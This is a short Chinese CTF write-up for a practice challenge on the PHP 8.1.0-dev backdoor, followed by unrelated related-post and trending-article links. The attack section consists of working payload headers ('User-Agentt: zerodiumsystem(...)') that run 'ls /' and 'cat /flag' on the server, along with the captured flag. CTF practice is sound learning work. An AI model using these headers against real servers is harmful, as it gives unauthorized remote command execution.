青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
阿巴~阿巴~24 分钟前
深入解析C++流运算符(>>和<<)重载:为何必须使用全局函数与友元机制
开发语言·c++
一只 Lemon1 小时前
PHP-单引号和双引号(通俗易懂讲解版)
开发语言·php
忧郁的蛋~1 小时前
C#中LINQ to DataSet操作及DataTable与LINQ相互转换
开发语言·c#·linq
呼哧呼哧.2 小时前
Java 8特性(一)
java·开发语言
胡萝卜的兔3 小时前
go语言标准库学习, fmt标准输出,Time 时间,Flag,Log日志,Strconv
开发语言·学习·golang
xingkongvv124 小时前
C# 异步编程
java·服务器·开发语言·前端·javascript
wjs20244 小时前
HTML DOM 访问
开发语言
枫景Maple8 小时前
C#字典Dictionary的内部实现原理
开发语言·c#
上单带刀不带妹10 小时前
Node.js 中的 fs 模块详解:文件系统操作全掌握
开发语言·javascript·node.js·fs模块
牵牛老人10 小时前
Qt中的QWebSocket 和 QWebSocketServer详解:从协议说明到实际应用解析
开发语言·qt·网络协议
热门推荐
01UV安装并设置国内源02全球最强模型Grok4,国内已可免费使用!(附教程)03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code042025年华数杯C题超详细解题思路05🚀Cursor CLI+GPT-5保姆级教程+编程能力测评!Cursor CLI零成本免费使用GPT-5!Claude Code的劲敌来了!从安装到实战演示06KGG转MP3工具|非KGM文件|解密音频07OpenAI重返开源!GPT-OSS本地部署完全指南08Cursor 终端“卡死/无响应”问题的解法09ChatGPT 5发布日期揭秘:2025年8月上线,多模态推理能力全面升级10如何在 Cursor 中继续使用 Claude